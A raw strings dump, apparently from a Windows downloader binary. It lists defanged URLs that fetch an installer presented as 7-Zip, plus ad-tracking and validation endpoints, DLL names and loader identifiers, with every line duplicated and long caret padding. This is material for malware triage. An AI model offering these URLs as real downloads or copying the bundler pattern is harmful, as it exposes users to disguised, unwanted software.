hXXp://secure.oi-installer5.com/o/wakenet_sevenzip/SevenZip_Setup.exe?mode=dlshiftcombined&subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&&callback&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&browser=--&useragent=NSISDL/1.2 (Mozilla) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hXXp://secure.oi-installer5.com/o/wakenet_sevenzip/SevenZip_Setup.exe?mode=dlshiftcombined&subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&&callback&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&browser=--&useragent=NSISDL/1.2 (Mozilla) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hXXp://secure.oi-installer5.com/validate/timestamp?ts=1418564576&sig=98F23C1CCEF11AAA52BBAB0B9031E99E ^^^^^^^^^^^^
hXXp://secure.oi-installer5.com/validate/timestamp?ts=1418564576&sig=98F23C1CCEF11AAA52BBAB0B9031E99E ^^^^^^^^^^^^
min.0.0.19
min.0.0.19
hXXp://secure.oinstaller6.com/o/7zip/setup.exe?&subid=self&tmpvar=00000000&mode=dlshift&adprovider=default
hXXp://secure.oinstaller6.com/o/7zip/setup.exe?&subid=self&tmpvar=00000000&mode=dlshift&adprovider=default
hXXp://imp.oi-imp4.com/impression.do/?event=
hXXp://imp.oi-imp4.com/impression.do/?event=
wininet.dll
wininet.dll
Kernel32.dll
Kernel32.dll
ntdll.dll
ntdll.dll
msvcrt.dll
msvcrt.dll
10&referrer=%d
10&referrer=%d
min_ldrf_exes
min_ldrf_exes
min_ldrf_exef
min_ldrf_exef
min_ldrf_rsrc_url
min_ldrf_rsrc_url
bs.exe
bs.exe
KERNEL32.DLL
KERNEL32.DLL
mscoree.dll
mscoree.dll
2.4.8.1
2.4.8.1
2.4.8.1
2.4.8.1